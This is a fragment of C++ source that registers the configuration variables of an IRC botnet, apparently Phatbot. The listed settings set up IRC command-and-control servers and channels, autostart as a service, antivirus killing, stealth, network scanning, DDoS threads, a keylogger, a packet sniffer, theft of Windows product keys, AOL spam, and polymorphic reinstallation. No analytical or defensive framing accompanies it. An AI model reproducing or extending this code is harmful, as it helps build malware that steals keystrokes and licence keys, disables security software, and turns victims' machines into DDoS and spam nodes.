REGCVAR(bot_ftrans_port,     sTemp.CStr(),    "Bot - File Transfer Port",                    false, 0);
REGCVAR(bot_ftrans_port_ftp, sTempFTP.CStr(), "Bot - File Transfer Port for FTP",            false, 0);
REGCVAR(si_chanpass,         "",              "Server Info - Channel Password",              false, 0);
REGCVAR(si_mainchan,         "",              "Server Info - Main Channel",                  false, 0);
REGCVAR(si_nickprefix,       "",              "Server Info - Nickname prefix",               false, 0);
REGCVAR(si_port,             "",              "Server Info - Server Port",                   false, 0);
REGCVAR(si_server,           "",              "Server Info - Server Address",                false, 0);
REGCVAR(si_servpass,         "",              "Server Info - Server Password",               false, 0);
REGCVAR(si_usessl,           "",              "Server Info - Use SSL ?",                     false, 0);
REGCVAR(si_nick,             "",              "Server Info - Nickname",                      false, 0);
REGCVAR(bot_version,         VERSION_PHATBOT, "Bot - Version",                               false, 0);
REGCVAR(bot_filename,        "",              "Bot - Runtime Filename",                      false, 0);
REGCVAR(bot_id,              "",              "Bot - Current ID",                            false, 0);
REGCVAR(bot_prefix,          "",              "Bot - Command Prefix",                        false, 0);
REGCVAR(bot_timeout,         "",              "Bot - Timeout for receiving in miliseconds",  false, 0);
REGCVAR(bot_seclogin,        "",              "Bot - Enable login only by channel messages", false, 0);
REGCVAR(bot_compnick,        "",              "Bot - Use the computer name as a nickname",   false, 0);
REGCVAR(bot_randnick,        "",              "Bot - Random nicks of Letters and Numbers",   false, 0);
REGCVAR(bot_meltserver,      "",              "Bot - Melt the original server file",         false, 0);
REGCVAR(bot_topiccmd,        "",              "Bot - Execute topic commands",                false, 0);
REGCVAR(do_speedtest,        "",              "Bot - Do speedtest on startup",               false, 0);
REGCVAR(do_avkill,           "",              "Bot - Enable AV kill",                        false, 0);
REGCVAR(do_stealth,          "",              "Bot - Enable Stealth",                        false, 0);
REGCVAR(as_valname,          "",              "Autostart - Value Name",                      false, 0);
REGCVAR(as_enabled,          "",              "Autostart - Enabled",                         false, 0);
REGCVAR(as_service,          "",              "Autostart - Start as service",                false, 0);
REGCVAR(as_service_name,     "",              "Autostart - Short service name",              false, 0);
REGCVAR(scan_maxthreads,     "",              "Scanner - Maximum Number of threads",         false, 0);
REGCVAR(scan_maxsockets,     "",              "Scanner - Maximum Number of sockets",         false, 0);
REGCVAR(ddos_maxthreads,     "",              "DDOS - Maximum Number of threads",            false, 0);
REGCVAR(redir_maxthreads,    "",              "Redirect - Maximum Number of threads",        false, 0);
REGCVAR(identd_enabled,      "",              "IdentD - Enable the server",                  false, 0);
REGCVAR(cdkey_windows,       "",              "Return Windows Product Keys on cdkey.get",    false, 0);
REGCVAR(scaninfo_chan,       "",              "Scanner - Output channel",                    false, 0);
REGCVAR(scaninfo_level,      "",              "Info Level 1(less) - (3)more",                false, 0);
REGCVAR(spam_aol_channel,    "",              "AOL Spam - Channel name",                     false, 0);
REGCVAR(spam_aol_enabled,    "",              "AOL Spam - Enabled ?",                        false, 0);
REGCVAR(sniffer_enabled,     "",              "Sniffer - Enabled ?",                         false, 0);
REGCVAR(sniffer_channel,     "",              "Sniffer - Output channel",                    false, 0);
REGCVAR(vuln_channel,        "",              "Vuln Daemon Sniffer Channel",                 false, 0);
REGCVAR(keylog_enabled,      "",              "Keylogger - Enabled ?",                       false, 0);
REGCVAR(keylog_channel,      "",              "KeyLogger Channel",                           false, 0);
REGCVAR(inst_polymorph,      "",              "Installer - Polymorph on install ?",          false, 0);
